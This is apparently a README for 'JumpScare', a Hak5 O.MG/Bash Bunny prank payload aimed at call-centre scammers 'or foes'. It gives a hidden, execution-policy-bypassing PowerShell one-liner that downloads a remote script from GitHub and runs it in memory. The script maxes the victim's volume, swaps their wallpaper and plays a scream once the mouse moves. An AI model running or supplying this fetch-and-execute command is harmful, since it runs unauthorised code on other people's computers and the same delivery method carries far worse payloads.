2.8 KiB
2.8 KiB
Table of Contents
JumpScare
A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes.
Description
This script starts off using Invoke-WebRequests to download both and Image and Sound file Their system volume is then turned up to the max level The script will be paused until a mouse movement is detected At that point there desktop wallpaper will be changed to the scary image provided and the scream sound effect will be played
Getting Started
Dependencies
- Windows 10,11
Executing program
- Plug in your device
- Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/I-Am-Jakoby/hak5-submissions/main/OMG/Payloads/OMG-JumpScare/JumpScare.ps1?dl=1; invoke-expression $pl
Contributing
All contributors names will be listed here
I am Jakoby
Version History
- 0.1
- Initial Release
Contact
I am Jakoby
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-JumpScare)